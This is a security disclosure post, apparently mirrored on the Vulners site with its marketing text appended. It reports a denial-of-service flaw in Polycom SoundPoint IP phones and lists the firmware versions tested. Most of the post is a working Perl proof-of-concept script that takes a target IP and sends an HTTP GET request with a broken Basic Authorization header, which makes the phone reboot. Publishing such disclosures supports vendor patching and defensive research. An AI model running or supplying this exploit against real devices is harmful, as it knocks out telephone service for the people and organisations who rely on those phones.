`Hello,
Polycom SoundPoint IP devices (IP phones) are vulnerable to Denial of
Service attacks. Sending HTTP GET request with broken Authorization
header effect a device restart after ~60 seconds.
It was tested on:
SoundPoint IP 335 (Version: 3.2.4.1734)
SoundPoint IP 430 (Version: 3.2.3.1734)
SoundPoint IP 450 (Version: 4.2.2.0710)
Proof Of Concept:
-----------------------------------------
#!/usr/bin/perl
use IO::Socket;
use strict;
use warnings;
if (!$ARGV[0]) {
print "Usage: $0 [IP]\n";
exit;
}
my $socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "80") || die "Error $!";
print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic\r\n\r\n";
#print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic \0\r\n\r\n";
-----------------------------------------
--
best regards
pawel gawinek
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation